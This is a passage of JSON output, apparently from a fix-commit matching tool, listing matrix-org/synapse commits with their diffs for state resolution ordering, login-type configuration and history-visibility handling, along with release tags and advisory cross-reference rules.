"v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8916, 8916", - "relevance": 32 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8916", - "relevance": 2 - } - ] - }, - { - "commit_id": "5e7d75daa2d53ea74c75f9a0db52c5590fc22038", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608303634, - "hunks": 4, - "message": "Fix mainline ordering in state res v2 (#8971) This had two effects 1) it'd give the wrong answer and b) would iterate *all* power levels in the auth chain of each event. The latter of which can be *very* expensive for certain types of IRC bridge rooms that have large numbers of power level changes.", - "diff": [ - "diff --git a/changelog.d/8971.bugfix b/changelog.d/8971.bugfix", - "new file mode 100644", - "index 000000000..c3e44b8c0", - "--- /dev/null", - "+++ b/changelog.d/8971.bugfix", - "@@ -0,0 +1 @@", - "+Fix small bug in v2 state resolution algorithm, which could also cause performance issues for rooms with large numbers of power levels.", - "diff --git a/synapse/state/v2.py b/synapse/state/v2.py", - "index f85124bf8..e585954bd 100644", - "--- a/synapse/state/v2.py", - "+++ b/synapse/state/v2.py", - "@@ -660,3 +660,3 @@ async def _get_mainline_depth_for_event(", - " while tmp_event:", - "- depth = mainline_map.get(event.event_id)", - "+ depth = mainline_map.get(tmp_event.event_id)", - " if depth is not None:", - "diff --git a/tests/state/test_v2.py b/tests/state/test_v2.py", - "index 09f4f32a0..77c72834f 100644", - "--- a/tests/state/test_v2.py", - "+++ b/tests/state/test_v2.py", - "@@ -90,3 +90,3 @@ class FakeEvent:", - " \"prev_events\": [(p, {}) for p in prev_events],", - "- \"event_id\": self.node_id,", - "+ \"event_id\": self.event_id,", - " \"sender\": self.sender,", - "@@ -383,2 +383,57 @@ class StateTestCase(unittest.TestCase):", - "+ def test_mainline_sort(self):", - "+ \"\"\"Tests that the mainline ordering works correctly.", - "+ \"\"\"", - "+", - "+ events = [", - "+ FakeEvent(", - "+ id=\"T1\", sender=ALICE, type=EventTypes.Topic, state_key=\"\", content={}", - "+ ),", - "+ FakeEvent(", - "+ id=\"PA1\",", - "+ sender=ALICE,", - "+ type=EventTypes.PowerLevels,", - "+ state_key=\"\",", - "+ content={\"users\": {ALICE: 100, BOB: 50}},", - "+ ),", - "+ FakeEvent(", - "+ id=\"T2\", sender=ALICE, type=EventTypes.Topic, state_key=\"\", content={}", - "+ ),", - "+ FakeEvent(", - "+ id=\"PA2\",", - "+ sender=ALICE,", - "+ type=EventTypes.PowerLevels,", - "+ state_key=\"\",", - "+ content={", - "+ \"users\": {ALICE: 100, BOB: 50},", - "+ \"events\": {EventTypes.PowerLevels: 100},", - "+ },", - "+ ),", - "+ FakeEvent(", - "+ id=\"PB\",", - "+ sender=BOB,", - "+ type=EventTypes.PowerLevels,", - "+ state_key=\"\",", - "+ content={\"users\": {ALICE: 100, BOB: 50}},", - "+ ),", - "+ FakeEvent(", - "+ id=\"T3\", sender=BOB, type=EventTypes.Topic, state_key=\"\", content={}", - "+ ),", - "+ FakeEvent(", - "+ id=\"T4\", sender=ALICE, type=EventTypes.Topic, state_key=\"\", content={}", - "+ ),", - "+ ]", - "+", - "+ edges = [", - "+ [\"END\", \"T3\", \"PA2\", \"T2\", \"PA1\", \"T1\", \"START\"],", - "+ [\"END\", \"T4\", \"PB\", \"PA1\"],", - "+ ]", - "+", - "+ # We expect T3 to be picked as the other topics are pointing at older", - "+ # power levels. Note that without mainline ordering we'd pick T4 due to", - "+ # it being sent *after* T3.", - "+ expected_state_ids = [\"T3\", \"PA2\"]", - "+", - "+ self.do_check(events, edges, expected_state_ids)", - "+", - " def do_check(self, events, edges, expected_state_ids):" - ], - "changed_files": [ - "changelog.d/8971.bugfix", - "synapse/state/v2.py", - "tests/state/test_v2.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8971": "Very slow state res in local rooms #8612" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8971, 8971", - "relevance": 32 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8971", - "relevance": 2 - } - ] - }, - { - "commit_id": "6d02eb22dfde9551c515acaf73503e2500e00eaf", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607978523, - "hunks": 8, - "message": "Fix startup failure with localdb_enabled: False (#8937)", - "diff": [ - "diff --git a/changelog.d/8937.bugfix b/changelog.d/8937.bugfix", - "new file mode 100644", - "index 000000000..01e184844", - "--- /dev/null", - "+++ b/changelog.d/8937.bugfix", - "@@ -0,0 +1 @@", - "+Fix bug introduced in Synapse v1.24.0 which would cause an exception on startup if both `enabled` and `localdb_enabled` were set to `False` in the `password_config` setting of the configuration file.", - "diff --git a/synapse/handlers/auth.py b/synapse/handlers/auth.py", - "index 8deec4cd0..21e568f22 100644", - "--- a/synapse/handlers/auth.py", - "+++ b/synapse/handlers/auth.py", - "@@ -200,23 +200,21 @@ class AuthHandler(BaseHandler):", - "- # we keep this as a list despite the O(N^2) implication so that we can", - "- # keep PASSWORD first and avoid confusing clients which pick the first", - "- # type in the list. (NB that the spec doesn't require us to do so and", - "- # clients which favour types that they don't understand over those that", - "- # they do are technically broken)", - "-", - " # start out by assuming PASSWORD is enabled; we will remove it later if not.", - "- login_types = []", - "+ login_types = set()", - " if self._password_localdb_enabled:", - "- login_types.append(LoginType.PASSWORD)", - "+ login_types.add(LoginType.PASSWORD)", - " for provider in self.password_providers:", - "- if hasattr(provider, \"get_supported_login_types\"):", - "- for t in provider.get_supported_login_types().keys():", - "- if t not in login_types:", - "- login_types.append(t)", - "+ login_types.update(provider.get_supported_login_types().keys())", - " if not self._password_enabled:", - "+ login_types.discard(LoginType.PASSWORD)", - "+", - "+ # Some clients just pick the first type in the list. In this case, we want", - "+ # them to use PASSWORD (rather than token or whatever), so we want to make sure", - "+ # that comes first, where it's present.", - "+ self._supported_login_types = []", - "+ if LoginType.PASSWORD in login_types:", - "+ self._supported_login_types.append(LoginType.PASSWORD)", - " login_types.remove(LoginType.PASSWORD)", - "-", - "- self._supported_login_types = login_types", - "+ self._supported_login_types.extend(login_types)", - "diff --git a/tests/handlers/test_password_providers.py b/tests/handlers/test_password_providers.py", - "index ceaf0902d..8d5026514 100644", - "--- a/tests/handlers/test_password_providers.py", - "+++ b/tests/handlers/test_password_providers.py", - "@@ -432,2 +432,25 @@ class PasswordAuthProviderTests(unittest.HomeserverTestCase):", - "+ @override_config(", - "+ {", - "+ **providers_config(CustomAuthProvider),", - "+ \"password_config\": {\"enabled\": False, \"localdb_enabled\": False},", - "+ }", - "+ )", - "+ def test_custom_auth_password_disabled_localdb_enabled(self):", - "+ \"\"\"Check the localdb_enabled == enabled == False", - "+", - "+ Regression test for https://github.com/matrix-org/synapse/issues/8914: check", - "+ that setting *both* `localdb_enabled` *and* `password: enabled` to False doesn't", - "+ cause an exception.", - "+ \"\"\"", - "+ self.register_user(\"localuser\", \"localpass\")", - "+", - "+ flows = self._get_login_flows()", - "+ self.assertEqual(flows, [{\"type\": \"test.login_type\"}] + ADDITIONAL_LOGIN_FLOWS)", - "+", - "+ # login shouldn't work and should be rejected with a 400 (\"unknown login type\")", - "+ channel = self._send_password_login(\"localuser\", \"localpass\")", - "+ self.assertEqual(channel.code, 400, channel.result)", - "+ mock_password_provider.check_auth.assert_not_called()", - "+", - " @override_config(" - ], - "changed_files": [ - "changelog.d/8937.bugfix", - "synapse/handlers/auth.py", - "tests/handlers/test_password_providers.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8937": "" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8937, 8937", - "relevance": 32 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8937", - "relevance": 2 - } - ] - }, - { - "commit_id": "be2db93b3c14396d53d30f8d5f92db014453487b", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608126397, - "hunks": 30, - "message": "Do not assume that the contents dictionary includes history_visibility. (#8945)", - "diff": [ - "diff --git a/changelog.d/8945.bugfix b/changelog.d/8945.bugfix", - "new file mode 100644", - "index 000000000..f9e6dbba5", - "--- /dev/null", - "+++ b/changelog.d/8945.bugfix", - "@@ -0,0 +1 @@", - "+Fix a bug where 500 errors would be returned if the `m.room_history_visibility` event had invalid content.", - "diff --git a/synapse/api/auth.py b/synapse/api/auth.py", - "index 1951f6e17..48c4d7b0b 100644", - "--- a/synapse/api/auth.py", - "+++ b/synapse/api/auth.py", - "@@ -25,3 +25,3 @@ from synapse import event_auth", - " from synapse.api.auth_blocking import AuthBlocking", - "-from synapse.api.constants import EventTypes, Membership", - "+from synapse.api.constants import EventTypes, HistoryVisibility, Membership", - " from synapse.api.errors import (", - "@@ -650,3 +650,4 @@ class Auth:", - " visibility", - "- and visibility.content[\"history_visibility\"] == \"world_readable\"", - "+ and visibility.content.get(\"history_visibility\")", - "+ == HistoryVisibility.WORLD_READABLE", - " ):", - "diff --git a/synapse/api/constants.py b/synapse/api/constants.py", - "index 592abd844..1932df83b 100644", - "--- a/synapse/api/constants.py", - "+++ b/synapse/api/constants.py", - "@@ -162 +162,8 @@ class AccountDataTypes:", - " IGNORED_USER_LIST = \"m.ignored_user_list\"", - "+", - "+", - "+class HistoryVisibility:", - "+ INVITED = \"invited\"", - "+ JOINED = \"joined\"", - "+ SHARED = \"shared\"", - "+ WORLD_READABLE = \"world_readable\"", - "diff --git a/synapse/handlers/room.py b/synapse/handlers/room.py", - "index 758341894..1f809fa16 100644", - "--- a/synapse/handlers/room.py", - "+++ b/synapse/handlers/room.py", - "@@ -29,2 +29,3 @@ from synapse.api.constants import (", - " EventTypes,", - "+ HistoryVisibility,", - " JoinRules,", - "@@ -83,3 +84,3 @@ class RoomCreationHandler(BaseHandler):", - " \"join_rules\": JoinRules.INVITE,", - "- \"history_visibility\": \"shared\",", - "+ \"history_visibility\": HistoryVisibility.SHARED,", - " \"original_invitees_have_ops\": False,", - "@@ -90,3 +91,3 @@ class RoomCreationHandler(BaseHandler):", - " \"join_rules\": JoinRules.INVITE,", - "- \"history_visibility\": \"shared\",", - "+ \"history_visibility\": HistoryVisibility.SHARED,", - " \"original_invitees_have_ops\": True,", - "@@ -97,3 +98,3 @@ class RoomCreationHandler(BaseHandler):", - " \"join_rules\": JoinRules.PUBLIC,", - "- \"history_visibility\": \"shared\",", - "+ \"history_visibility\": HistoryVisibility.SHARED,", - " \"original_invitees_have_ops\": False,", - "diff --git a/synapse/handlers/room_list.py b/synapse/handlers/room_list.py", - "index 4a13c8e91..bf58d302b 100644", - "--- a/synapse/handlers/room_list.py", - "+++ b/synapse/handlers/room_list.py", - "@@ -22,3 +22,3 @@ from unpaddedbase64 import decode_base64, encode_base64", - "-from synapse.api.constants import EventTypes, JoinRules", - "+from synapse.api.constants import EventTypes, HistoryVisibility, JoinRules", - " from synapse.api.errors import Codes, HttpResponseException", - "@@ -161,3 +161,4 @@ class RoomListHandler(BaseHandler):", - " \"avatar_url\": room[\"avatar\"],", - "- \"world_readable\": room[\"history_visibility\"] == \"world_readable\",", - "+ \"world_readable\": room[\"history_visibility\"]", - "+ == HistoryVisibility.WORLD_READABLE,", - " \"guest_can_join\": room[\"guest_access\"] == \"can_join\",", - "@@ -319,3 +320,3 @@ class RoomListHandler(BaseHandler):", - " visibility = visibility_event.content.get(\"history_visibility\", None)", - "- result[\"world_readable\"] = visibility == \"world_readable\"", - "+ result[\"world_readable\"] = visibility == HistoryVisibility.WORLD_READABLE", - "diff --git a/synapse/handlers/user_directory.py b/synapse/handlers/user_directory.py", - "index f263a638f..3d80371f0 100644", - "--- a/synapse/handlers/user_directory.py", - "+++ b/synapse/handlers/user_directory.py", - "@@ -18,3 +18,3 @@ import logging", - " import synapse.metrics", - "-from synapse.api.constants import EventTypes, JoinRules, Membership", - "+from synapse.api.constants import EventTypes, HistoryVisibility, JoinRules, Membership", - " from synapse.handlers.state_deltas import StateDeltasHandler", - "@@ -252,3 +252,3 @@ class UserDirectoryHandler(StateDeltasHandler):", - " key_name=\"history_visibility\",", - "- public_value=\"world_readable\",", - "+ public_value=HistoryVisibility.WORLD_READABLE,", - " )", - "diff --git a/synapse/notifier.py b/synapse/notifier.py", - "index a17352ef4..c4c8bb271 100644", - "--- a/synapse/notifier.py", - "+++ b/synapse/notifier.py", - "@@ -36,3 +36,3 @@ from twisted.internet import defer", - " import synapse.server", - "-from synapse.api.constants import EventTypes, Membership", - "+from synapse.api.constants import EventTypes, HistoryVisibility, Membership", - " from synapse.api.errors import AuthError", - "@@ -613,3 +613,5 @@ class Notifier:", - " if state and \"history_visibility\" in state.content:", - "- return state.content[\"history_visibility\"] == \"world_readable\"", - "+ return (", - "+ state.content[\"history_visibility\"] == HistoryVisibility.WORLD_READABLE", - "+ )", - " else:", - "diff --git a/synapse/storage/databases/main/user_directory.py b/synapse/storage/databases/main/user_directory.py", - "index d87ceec6d..fc8caf46a 100644", - "--- a/synapse/storage/databases/main/user_directory.py", - "+++ b/synapse/storage/databases/main/user_directory.py", - "@@ -19,3 +19,3 @@ from typing import Any, Dict, Iterable, Optional, Set, Tuple", - "-from synapse.api.constants import EventTypes, JoinRules", - "+from synapse.api.constants import EventTypes, HistoryVisibility, JoinRules", - " from synapse.storage.database import DatabasePool", - "@@ -362,3 +362,6 @@ class UserDirectoryBackgroundUpdateStore(StateDeltasStore):", - " if hist_vis_ev:", - "- if hist_vis_ev.content.get(\"history_visibility\") == \"world_readable\":", - "+ if (", - "+ hist_vis_ev.content.get(\"history_visibility\")", - "+ == HistoryVisibility.WORLD_READABLE", - "+ ):", - " return True", - "diff --git a/synapse/visibility.py b/synapse/visibility.py", - "index 527365498..f2836ba9f 100644", - "--- a/synapse/visibility.py", - "+++ b/synapse/visibility.py", - "@@ -14,3 +14,2 @@", - " # limitations under the License.", - "-", - " import logging", - "@@ -18,3 +17,8 @@ import operator", - "-from synapse.api.constants import AccountDataTypes, EventTypes, Membership", - "+from synapse.api.constants import (", - "+ AccountDataTypes,", - "+ EventTypes,", - "+ HistoryVisibility,", - "+ Membership,", - "+)", - " from synapse.events.utils import prune_event", - "@@ -27,3 +31,8 @@ logger = logging.getLogger(__name__)", - "-VISIBILITY_PRIORITY = (\"world_readable\", \"shared\", \"invited\", \"joined\")", - "+VISIBILITY_PRIORITY = (", - "+ HistoryVisibility.WORLD_READABLE,", - "+ HistoryVisibility.SHARED,", - "+ HistoryVisibility.INVITED,", - "+ HistoryVisibility.JOINED,", - "+)", - "@@ -152,8 +161,10 @@ async def filter_events_for_client(", - " if visibility_event:", - "- visibility = visibility_event.content.get(\"history_visibility\", \"shared\")", - "+ visibility = visibility_event.content.get(", - "+ \"history_visibility\", HistoryVisibility.SHARED", - "+ )", - " else:", - "- visibility = \"shared\"", - "+ visibility = HistoryVisibility.SHARED", - " if visibility not in VISIBILITY_PRIORITY:", - "- visibility = \"shared\"", - "+ visibility = HistoryVisibility.SHARED", - "@@ -167,3 +178,3 @@ async def filter_events_for_client(", - " if prev_visibility not in VISIBILITY_PRIORITY:", - "- prev_visibility = \"shared\"", - "+ prev_visibility = HistoryVisibility.SHARED", - "@@ -212,3 +223,3 @@ async def filter_events_for_client(", - "- if visibility == \"joined\":", - "+ if visibility == HistoryVisibility.JOINED:", - " # we weren't a member at the time of the event, so we can't", - "@@ -217,3 +228,3 @@ async def filter_events_for_client(", - "- elif visibility == \"invited\":", - "+ elif visibility == HistoryVisibility.INVITED:", - " # user can also see the event if they were *invited* at the time", - "@@ -222,3 +233,3 @@ async def filter_events_for_client(", - "- elif visibility == \"shared\" and is_peeking:", - "+ elif visibility == HistoryVisibility.SHARED and is_peeking:", - " # if the visibility is shared, users cannot see the event unless", - "@@ -286,4 +297,6 @@ async def filter_events_for_server(", - " if history:", - "- visibility = history.content.get(\"history_visibility\", \"shared\")", - "- if visibility in [\"invited\", \"joined\"]:", - "+ visibility = history.content.get(", - "+ \"history_visibility\", HistoryVisibility.SHARED", - "+ )", - "+ if visibility in [HistoryVisibility.INVITED, HistoryVisibility.JOINED]:", - " # We now loop through all state events looking for", - "@@ -307,3 +320,3 @@ async def filter_events_for_server(", - " elif memtype == Membership.INVITE:", - "- if visibility == \"invited\":", - "+ if visibility == HistoryVisibility.INVITED:", - " return True", - "@@ -338,3 +351,4 @@ async def filter_events_for_server(", - " all_open = all(", - "- e.content.get(\"history_visibility\") in (None, \"shared\", \"world_readable\")", - "+ e.content.get(\"history_visibility\")", - "+ in (None, HistoryVisibility.SHARED, HistoryVisibility.WORLD_READABLE)", - " for e in event_map.values()" - ], - "changed_files": [ - "changelog.d/8945.bugfix", - "synapse/api/auth.py", - "synapse/api/constants.py", - "synapse/handlers/room.py", - "synapse/handlers/room_list.py", - "synapse/handlers/user_directory.py", - "synapse/notifier.py", - "synapse/storage/databases/main/user_directory.py", - "synapse/visibility.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8945": "" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - 